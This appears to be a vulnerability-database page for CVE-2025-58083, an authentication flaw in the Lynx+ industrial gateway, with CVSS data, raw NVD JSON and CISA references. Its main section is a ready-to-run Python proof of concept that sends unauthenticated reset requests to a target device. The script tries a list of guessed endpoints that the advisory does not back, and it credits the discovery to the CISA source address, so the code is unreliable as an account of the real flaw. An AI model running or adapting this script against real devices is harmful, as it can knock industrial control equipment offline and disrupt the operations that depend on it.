Security Vulnerability Report
中文
CVE-2025-58083 CVSS 10.0 CRITICAL

CVE-2025-58083

Published: 2025-11-15 00:15:47
Last Modified: 2026-04-15 00:35:42

Description

General Industrial Controls Lynx+ Gateway  is missing critical authentication in the embedded web server which could allow an attacker to remotely reset the device.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

General Industrial Controls Lynx+ Gateway (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-58083 PoC - Lynx+ Gateway Authentication Bypass Discovered by: [email protected] CVSS Score: 10.0 (CRITICAL) """ import requests import sys import argparse def reset_device(target_ip, target_port=80): """ Exploit the missing authentication vulnerability to reset the Lynx+ Gateway device """ print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Exploiting CVE-2025-58083...") # Common reset endpoints reset_endpoints = [ "/api/reset", "/admin/reset", "/cgi-bin/reset", "/api/system/reset", "/admin/factory/reset", "/cgi-bin/system?action=reset" ] for endpoint in reset_endpoints: try: url = f"http://{target_ip}:{target_port}{endpoint}" # Send reset request without any authentication headers = { 'User-Agent': 'Mozilla/5.0 (compatible; exploit-poc)', 'Content-Type': 'application/x-www-form-urlencoded' } response = requests.post(url, headers=headers, timeout=5, verify=False) print(f"[*] Testing endpoint: {endpoint}") print(f"[*] Status Code: {response.status_code}") # Check for successful reset indication if response.status_code in [200, 201, 204]: print(f"[!] Possible successful reset trigger at {endpoint}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") continue print("[*] Reset endpoints tested. Check device status manually.") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-58083 PoC') parser.add_argument('target', help='Target IP address') parser.add_argument('-p', '--port', type=int, default=80, help='Target port (default: 80)') args = parser.parse_args() reset_device(args.target, args.port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58083", "sourceIdentifier": "[email protected]", "published": "2025-11-15T00:15:47.087", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "General Industrial Controls Lynx+ Gateway \n is missing critical authentication in the embedded web server which could allow an attacker to remotely reset the device."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-317-08.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-317-08", "source": "[email protected]"}]}}